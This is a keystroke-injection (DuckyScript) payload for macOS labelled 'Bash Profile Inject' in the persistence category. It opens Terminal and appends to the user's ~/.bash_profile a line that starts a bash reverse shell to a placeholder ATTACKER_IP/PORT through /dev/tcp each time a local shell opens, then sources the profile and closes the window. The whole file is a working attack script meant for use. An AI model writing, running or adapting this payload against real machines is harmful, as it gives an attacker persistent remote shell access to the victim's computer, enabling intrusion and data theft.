REM Author: Generated
REM Title: Bash Profile Inject
REM Target: macOS
REM Version: 1.0
REM Category: Persistence
REM ---
DELAY 1000
REM Inject reverse shell into bash profile
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING echo 'if [ -z "$SSH_TTY" ]; then (sleep 5 && /bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1) & fi' >> ~/.bash_profile
ENTER
DELAY 500
STRING source ~/.bash_profile
ENTER
DELAY 500
STRING echo 'Profile inject complete'
ENTER
DELAY 500
GUI w
